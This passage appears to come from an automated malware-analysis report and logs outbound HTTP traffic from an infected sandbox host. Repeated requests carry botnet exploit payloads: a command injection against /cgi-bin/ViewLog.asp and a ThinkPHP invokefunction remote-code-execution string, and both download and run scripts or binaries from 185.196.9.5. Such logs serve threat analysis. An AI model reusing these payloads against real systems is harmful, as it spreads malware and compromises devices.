Feb 25, 2024 19:05:15.284635067 CET	1286	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=utf-8 server: Rocket permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), keyboard-map=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), screen-wake-lock=(), sync-xhr=(), usb=(), web-share=(), xr-spatial-tracking=() x-content-type-options: nosniff x-frame-options: SAMEORIGIN referrer-policy: same-origin x-xss-protection: 0 content-security-policy: default-src 'self'; base-uri 'self'; form-action 'self'; object-src 'self' blob:; script-src 'self' 'wasm-unsafe-eval'; style-src 'self' 'unsafe-inline'; child-src 'self' https://.duosecurity.com https://.duofederal.com; frame-src 'self' https://.duosecurity.com https://.duofederal.com; frame-ancestors 'self' chrome-extension://nngceckbapebfimnlniiiahkandclblb chrome-extension://jbkfoedolllekgbhcbcoahefnbanhhlh moz-extension://* ; img-src 'self' data: https://haveibeenpwned.com https://www.gravatar.com ; connect-src 'self' https://api.pwnedpasswords.com https://api.2fa.directory https://app.simplel Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
1103	192.168.2.15	51840	31.136.123.160	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.227629900 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:15.780884027 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:16.900939941 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:19.333020926 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:23.940848112 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:32.900888920 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1104	192.168.2.15	56544	62.29.114.245	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.295089006 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1105	192.168.2.15	53724	112.51.126.118	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.379395008 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:15.778465986 CET	435	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Sun, 25 Feb 2024 18:05:15 GMT Content-Type: text/html Content-Length: 265 Connection: close Via: live5.cn6410[,0] Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body bgcolor="white"><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1106	192.168.2.15	54860	94.122.50.89	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.450047970 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1107	192.168.2.15	56730	94.121.41.198	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.451818943 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1108	192.168.2.15	59302	31.200.93.102	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.452110052 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1109	192.168.2.15	47136	88.247.10.132	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.625729084 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1110	192.168.2.15	48816	85.208.123.247	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.901030064 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:16.128478050 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 17:35:33 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
1111	192.168.2.15	54242	94.120.254.57	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.901133060 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1112	192.168.2.15	34220	95.101.220.182	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:16.067701101 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:16.268645048 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:16 GMT Date: Sun, 25 Feb 2024 18:05:16 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 38 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 31 36 26 23 34 36 3b 61 34 36 34 61 35 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.680b1502.1708884316.a464a51</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1113	192.168.2.15	43732	95.101.43.67	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:16.082264900 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:16.292454958 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:16 GMT Date: Sun, 25 Feb 2024 18:05:16 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 32 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 31 36 26 23 34 36 3b 64 61 66 63 61 32 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a2c91002.1708884316.dafca2a</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1114	192.168.2.15	41550	95.56.25.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:16.332063913 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:16.596075058 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:05:16.597028017 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
1115	192.168.2.15	45656	88.99.189.226	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:16.967571974 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:17.149821043 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:17 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1116	192.168.2.15	50488	88.99.148.196	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:16.969310999 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:17.153569937 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:17 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1117	192.168.2.15	33206	85.122.231.20	8080

Timestamp	Bytes transferred	Direction	Data
